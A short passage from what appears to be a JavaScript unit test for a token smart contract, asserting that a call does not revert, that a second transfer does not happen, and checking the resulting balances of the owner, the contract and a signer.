dec)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(val)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); });